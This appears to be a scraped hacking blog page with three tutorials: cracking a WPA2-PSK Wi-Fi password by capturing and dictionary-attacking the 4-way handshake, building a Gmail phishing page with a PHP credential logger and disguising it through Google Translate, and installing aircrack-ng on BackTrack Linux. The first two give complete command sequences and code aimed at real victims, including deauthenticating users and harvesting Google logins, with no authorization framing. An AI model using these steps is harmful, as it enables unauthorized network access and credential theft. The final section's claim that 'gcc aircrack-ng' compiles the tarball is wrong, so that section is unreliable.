Breaking News

How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ngand a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter*
As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack nameddarkcOde.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.
Read more ...

Social Engineering: Hack Google Accounts with a Google Translator Exploit

Google is our friend, but it still has its flaws as everything tends to. A little known flaw within the media giant allows phishing to take place on Google accounts that would completely bypass advanced web protection programs in user's browsers—as well as other protections that have been put in place by Google. How would it do this? The domain will read as if it is through Google itself.
Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit
It also plays on human psychology, because the domain appears to be a trusted one that you would visit rather regularly. This kind of phishing allows people to steal credentials in plain-text, and by using this method, said hackers likely do so without anyone realizing.


  • A webhosting account
  • Cpanel access to the webhost

Step 1 Create a Gmail Phishing Page

First, we need to make a phishing page to prepare.
  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Google login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste the below as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
    $handle = fopen("passwords.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    fwrite($handle, "\r\n");
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your hosting account, and upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 2 Manipulating Google

How exactly does the manipulation work behind this? Google Translator. Google translator has a vulnerability that if an attacker creates a fake gmail login page and then translates it with the tool, they would get a perfectly crafted link masked by Google itself. Check out this URL for an example of a phishing page that was created and then masked after using the translation tool.
This fools users into thinking the page is legit. I mean, look at the URL:
Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit
  1. Go to Google translate.
  2. Translate your page from a different language into English.
  3. Click the link and test.
See how frighteningly easy it is to manipulate a website even as large as Google? Keep safe by always analyzing that URL.
Read more ...

Basic Linux Guide and Tutorial - Chapter6 (Installing New Software)

Step 1:  GUI Package Manager

The simplest way to install software on BackTrack is to use the GUI package manager. In my KDE-based BackTrack 5, the GUI package manager is called KPackageKit (some of you may have Synaptic).
These package managers enable us find packages, download them, and install them on our system. We can open KPackageKit by navigating toSystem and then KPackageKit as shown in the screenshot below.
When open, you simply put the name into search field. It will then retrieve all the options fulfilling the criteria of your search, then just click on the icon next to the package you want to download.
In this example, we will be looking for the wireless hacking software,aircrack-ng.
Note that if the package is already installed, there will be an X next to it. If not, there will be a downward-pointing arrow. Click on the arrow and then click on the APPLY button below.

Step 2: Updating Your Repositories

Package managers search in specified repositories (websites housing packages) for the package you are seeking. If you get a message that the package was not found, it doesn't necessarily mean that it doesn't exist, but simply that it's not in the repositories your OS is searching.
BackTrack defaults to searching in backtrack-linux.org where many hacking tools are available. Unfortunately, if you are looking for something that is not a hacking tool or a new hacking tool that BackTrack hasn't yet placed in its repository, you may have to revise where your operating system searching for packages.
This can be done by editing the /etc/apt/sources.list file. Let's open it withKWrite and take a look.
As you can see, BackTrack has three default sources on its sources.list, all pointing to BackTrack repositories. We can add any repository with Linux software to this list, but since BackTrack is a Ubuntu distribution, we might want to add an Ubuntu repository to this list to download and install Ubuntu software. We can do this by adding a single line to this file:
Now when I use my package manager, it will search the three BackTrack repositories first, and if it fails to find the package in any of those places, it will then search for it in the Ubuntu repository.

Step 3: Command Line Package Management

Ubuntu also has a command line package manager called apt. The basic syntax for using apt to download packages is:
  • apt-get install aircrack-ng
So, let's open a terminal and type the above command to install aircrack-ng(of course, we just need to replace the name of the package to install other software).
If the package is in one of our repositories, it will download it and any of the necessary dependencies (files that the package need to run properly), and install it on your system automatically.

Step 4: Installing from Source

Finally, sometimes you will need to download software that is neither in a repository, nor in a package. Most often these are archived as tar or tarballs. These are files that are "tarred" together into a single file and often compressed (similar to zipping files with WinZip and then putting them together into a .zip file).
Let's say that aircrack-ng was not in our repository (some software never finds its way into a repository) and we had to download it from aircrack-ng.org website. We could download the file aircrack-ng-1.2-beta1.tar.
Once we've downlaoded it, then we need to untar it using the tar command:
  • tar xvf aircrack-ng-1.2-beta1.tar
This will untar and uncompress it, if it's compressed. Next we need to compile it with the GNU compiler. Compiling from source code will give us binaries (the program files) that are optimized for our hardware and operating system, meaning they will often run faster and more efficiently. We can compile this source code by typing:
  • gcc aircrack-ng
Finally, we can now run this file from within the directory where we unzipped it:
  • ./aircrack-ng
Note that to run the file, we preceded it with the ./, which tells Linux to execute this file from the directory we are presently in, so make certain you run this command in the same directory that you compiled the source code in.
That should cover all the major ways of installing software and I hope it wasn't too confusing. In most cases, we can simply use the GUI based package manager to install software, but like all things in life, there are exceptions.
Read more ...
Copyright © techiepedia ®